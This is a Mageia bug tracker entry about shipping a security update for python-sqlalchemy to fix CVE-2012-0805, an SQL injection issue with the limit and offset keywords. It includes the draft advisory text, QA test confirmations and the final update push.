Bug 5268 - python-sqlalchemy new security issue CVE-2012-0805
Summary: python-sqlalchemy new security issue CVE-2012-0805
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 1
Hardware: i586 Linux
Priority: Normal normal
Target Milestone: ---
Assignee: QA Team
QA Contact:
URL:
Whiteboard:
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2012-04-07 16:26 CEST by David Walser
Modified: 2012-04-11 22:04 CEST (History)
4 users (show)

See Also:
Source RPM: python-sqlalchemy-0.6.6-1.mga1.src.rpm
CVE:
Status comment:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description David Walser 2012-04-07 16:26:28 CEST 
RedHat has issued this advisory on March 7:
https://rhn.redhat.com/errata/RHSA-2012-0369.html

Cauldron is not vulnerable.

It looks like this, and many other bugs, can be fixed by upgrading to 0.6.8.

More info here;
https://bugzilla.redhat.com/show_bug.cgi?id=783305
David Walser 2012-04-07 16:26:47 CEST

CC: (none) => makowski.mageia

Philippe Makowski 2012-04-09 11:01:40 CEST

Assignee: bugsquad => makowski.mageia

Comment 1 Philippe Makowski 2012-04-09 17:07:41 CEST 
python-sqlalchemy-0.6.8-1.mga1 is in 1/core/updates_testing

Status: NEW => ASSIGNED

Comment 2 David Walser 2012-04-09 17:13:51 CEST 
Thanks Philippe.

Advisory:
========================

Updated python-sqlalchemy package fixes security vulnerability:

It was discovered that SQLAlchemy did not sanitize values for the limit
and offset keywords for SQL select statements. If an application using
SQLAlchemy accepted values for these keywords, and did not filter or
sanitize them before passing them to SQLAlchemy, it could allow an attacker
to perform an SQL injection attack against the application (CVE-2012-0805).

python-sqlalchemy has been updated to version 0.6.8 which fixes this
vulnerability as well as several other bugs.

Note: All running applications using SQLAlchemy must be restarted
for this update to take effect.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0805
https://rhn.redhat.com/errata/RHSA-2012-0369.html
========================

Updated packages in core/updates_testing:
========================
python-sqlalchemy-0.6.8-1.mga1.i586.rpm

from python-sqlalchemy-0.6.8-1.mga1.src.rpm

Assignee: makowski.mageia => qa-bugs

Comment 3 Dave Hodgins 2012-04-10 22:05:14 CEST 
Testing complete on i586 for the srpm
python-sqlalchemy-0.6.8-1.mga1.src.rpm

Tested using gourmet as per
https://bugs.mageia.org/show_bug.cgi?id=1738#c5

CC: (none) => davidwhodgins

Comment 4 Manuel Hiebel 2012-04-11 02:37:28 CEST 
Testing complete on x86_64


Suggested Advisory:
-------------
Updated python-sqlalchemy package fixes security vulnerability:

It was discovered that SQLAlchemy did not sanitize values for the limit
and offset keywords for SQL select statements. If an application using
SQLAlchemy accepted values for these keywords, and did not filter or
sanitize them before passing them to SQLAlchemy, it could allow an attacker
to perform an SQL injection attack against the application (CVE-2012-0805).

python-sqlalchemy has been updated to version 0.6.8 which fixes this
vulnerability as well as several other bugs.

Note: All running applications using SQLAlchemy must be restarted
for this update to take effect.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0805
https://rhn.redhat.com/errata/RHSA-2012-0369.html

https://bugs.mageia.org/show_bug.cgi?id=5268
-------------

SRPM: python-sqlalchemy-0.6.8-1.mga1.src.rpm

Could sysadmin please push from core/updates_testing to core/updates

Thankyou!

Keywords: (none) => validated_update
CC: (none) => sysadmin-bugs

Comment 5 Thomas Backlund 2012-04-11 22:04:05 CEST 
Update pushed

Status: ASSIGNED => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED
Note You need to log in before you can comment on or make changes to this bug.